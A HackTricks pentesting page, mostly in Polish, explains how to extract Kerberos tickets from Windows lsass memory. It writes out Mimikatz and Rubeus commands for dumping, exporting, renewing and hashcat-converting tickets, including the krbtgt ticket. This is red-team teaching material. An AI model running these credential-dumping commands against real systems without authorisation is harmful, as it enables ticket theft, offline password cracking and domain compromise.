Harvesting tickets from Windows

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bilety w systemie Windows są zarządzane i przechowywane przez proces lsass (Local Security Authority Subsystem Service), odpowiedzialny za obsługę polityk bezpieczeństwa. Aby wyodrębnić te bilety, konieczne jest interfejsowanie z procesem lsass. Użytkownik niebędący administratorem może uzyskać dostęp tylko do swoich własnych biletów, podczas gdy administrator ma przywilej wyodrębnienia wszystkich biletów w systemie. Do takich operacji powszechnie stosowane są narzędzia Mimikatz i Rubeus, z których każde oferuje różne polecenia i funkcjonalności.

Mimikatz

Mimikatz to wszechstronne narzędzie, które może interagować z bezpieczeństwem systemu Windows. Jest używane nie tylko do wyodrębniania biletów, ale także do różnych innych operacji związanych z bezpieczeństwem.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus to narzędzie specjalnie dostosowane do interakcji i manipulacji Kerberos. Służy do ekstrakcji i obsługi biletów, a także innych działań związanych z Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Kiedy używasz tych poleceń, upewnij się, że zastępujesz miejsca na dane, takie jak <BASE64_TICKET> i <luid>, rzeczywistym zakodowanym w Base64 biletem i identyfikatorem logowania. Te narzędzia oferują rozbudowaną funkcjonalność do zarządzania biletami i interakcji z mechanizmami zabezpieczeń systemu Windows.

References

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.

Previous88tcp/udp - Pentesting Kerberos NextHarvesting tickets from Linux

Last updated 4 months ago

# Dumping all tickets using Rubeus .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Listing all tickets .\Rubeus.exe triage # Dumping a specific ticket by LUID .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Renewing a ticket .\Rubeus.exe renew /ticket:<BASE64_TICKET> # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket:<BASE64_TICKET>